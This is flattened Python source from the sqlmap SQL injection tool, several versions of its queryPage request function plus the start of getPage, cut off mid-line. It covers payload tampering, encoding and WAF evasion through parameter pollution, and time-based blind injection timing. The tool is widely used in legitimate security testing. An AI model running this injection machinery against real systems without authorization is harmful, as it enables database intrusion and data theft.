def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None urlEncodePost = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = dict(conf.httpHeaders) contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) urlEncodePost = contentType and "urlencoded" in contentType or contentType is None if (kb.postHint or conf.skipUrlEncode) and urlEncodePost: urlEncodePost = False conf.httpHeaders = [ _ for _ in conf.httpHeaders if _[1] != contentType ] contentType = POST_HINT_CONTENT_TYPES.get( kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append( (HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be throughly URL encoded if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE ) and not conf.skipUrlEncode or place in ( PLACE.POST, ) and urlEncodePost: payload = urlencode(payload, '%', False, place != PLACE.URI) value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search( "(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(' '), ' '): if splitter in payload: prefix, suffix = ( "*/", "/*") if splitter == ' ' else ( urlencode(_) for _ in ("*/", "/*")) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) payload = "".join(parts) for splitter in (urlencode(','), ','): payload = payload.replace( splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[ PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[ PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace( CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value post = post.replace(ASTERISK_MARKER, '*') if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[ PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[ PLACE. USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[ PLACE. REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[ PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: if not auxHeaders: auxHeaders = {} auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter( cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name, repr(value)), variables) if cookie: for part in cookie.split(conf.cDel or DEFAULT_COOKIE_DELIMITER): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name, repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if re.search(r"\b%s=" % name, (get or "")): get = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif re.search(r"\b%s=" % name, (post or "")): post = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif re.search(r"\b%s=" % name, (cookie or "")): cookie = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, conf.cDel or DEFAULT_COOKIE_DELIMITER), "\g<1>%s" % value, cookie) elif post is not None: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr( post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif urlEncodePost: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based payloads" singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: if kb.nullConnection in ( NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ ) and HTTP_HEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTP_HEADER.CONTENT_RANGE] [headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison( page, headers, code, getRatioValue=True, pageLength=pageLength) else: return comparison(page, headers, code, getRatioValue, pageLength)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET if not auxHeaders: auxHeaders = {} raise404 = place != PLACE.URI if raise404 is None else raise404 method = method or conf.method value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = OrderedDict(conf.httpHeaders) contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: try: payload = function(payload=payload, headers=auxHeaders) except Exception, ex: errMsg = "error occurred while running tamper " errMsg += "function '%s' ('%s')" % (function.func_name, ex) raise SqlmapGenericException(errMsg) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode: payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(' '), ' '): if splitter in payload: prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*")) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) payload = "".join(parts) for splitter in (urlencode(','), ','): payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None page = None pageLength = None uri = None raise404 = place != PLACE.URI if raise404 is None else raise404 if not place: place = kb.injection.place payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(9, payload) if place == PLACE.COOKIE and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value) value = urlEncodeCookieValues(value) elif place: if place in (PLACE.GET, PLACE.POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char payload = urlencode(payload, "%", False, True) value = agent.replacePayload(value, payload) value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = urlencode(conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value, limit=True) if PLACE.POST in conf.parameters: post = urlencode(conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value) if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[ PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[ PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[ PLACE. REFERER] if place != PLACE.REFERER or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." logger.warn(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE] [headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) if kb.testMode: kb.testQueryCount += 1 if conf.cj: conf.cj.clear() if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if content or response: return page, headers page = removeReflectiveValues(page, payload) if getRatioValue: return comparison(page, getRatioValue=False, pageLength=pageLength), comparison( page, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, getRatioValue, pageLength) else: return False
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None skipUrlEncode = conf.skipUrlEncode if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if skipUrlEncode is None and conf.httpHeaders: headers = dict(conf.httpHeaders) _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if _ and "urlencoded" not in _: skipUrlEncode = True if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload, auxHeaders = function(payload=payload, headers=auxHeaders) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or ( value and payload and '?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, '%', False, True) if place not in ( PLACE.POST, PLACE.CUSTOM_POST ) and not skipUrlEncode else payload value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if place == PLACE.COOKIE and conf.cookieUrlencode: value = urlEncodeCookieValues(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[ PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[ PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace( CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[ PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[ PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[ PLACE. USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[ PLACE. REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[ PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter( cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s=%s" % (name, repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post: if conf.skipUrlEncode is None: _ = (post or "").strip() if _.startswith("<") and _.endswith(">"): msg = "provided POST data looks " msg += "like it's in XML format. " msg += "Do you want to turn off URL encoding " msg += "which is usually causing problems " msg += "in this kind of situations? [Y/n]" skipUrlEncode = conf.skipUrlEncode = readInput( msg, default="Y").upper() != "N" if place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr( post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not skipUrlEncode and place not in (PLACE.SOAP, ): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTPHEADER.CONTENT_RANGE] [headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None kb.permissionFlag = re.search( r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison( page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def getPage(**kwargs): """ This method connects to the target URL or proxy and returns the target URL page content """ if isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) if conf.dummy: return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt()) threadData = getCurrentThreadData() with kb.locks.request: kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter url = kwargs.get("url", None) or conf.url get = kwargs.get("get", None) post = kwargs.get("post", None) method = kwargs.get("method", None) cookie = kwargs.get("cookie", None) ua = kwargs.get("ua", None) or conf.agent referer = kwargs.get("referer", None) or conf.referer host = kwargs.get("host", None) or conf.host direct_ = kwargs.get("direct", False) multipart = kwargs.get("multipart", False) silent = kwargs.get("silent", False) raise404 = kwargs.get("raise404", True) timeout = kwargs.get("timeout", None) or conf.timeout auxHeaders = kwargs.get("auxHeaders", None) response = kwargs.get("response", False) ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout refreshing = kwargs.get("refreshing", False) retrying = kwargs.get("retrying", False) crawling = kwargs.get("crawling", False) skipRead = kwargs.get("skipRead", False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") conn = None code = None page = None _ = urlparse.urlsplit(url) requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) try: socket.setdefaulttimeout(timeout) if direct_: if '?' in url: url, params = url.split('?', 1) params = urlencode(params) url = "%s?%s" % (url, params) elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect._connReadProxy(conn) if not skipRead else None responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) return page elif any((refreshing, crawling)): pass elif target: if conf.forceSSL and urlparse.urlparse(url).scheme != "https": url = re.sub("\Ahttp:", "https:", url, re.I) url = re.sub(":80/", ":443/", url, re.I) if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] if not conf.skipUrlEncode: get = urlencode(get, limit=True) if get: if '?' in url: url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get) requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get) else: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET: post = conf.parameters[PLACE.POST] elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) if kb.authHeader: headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: 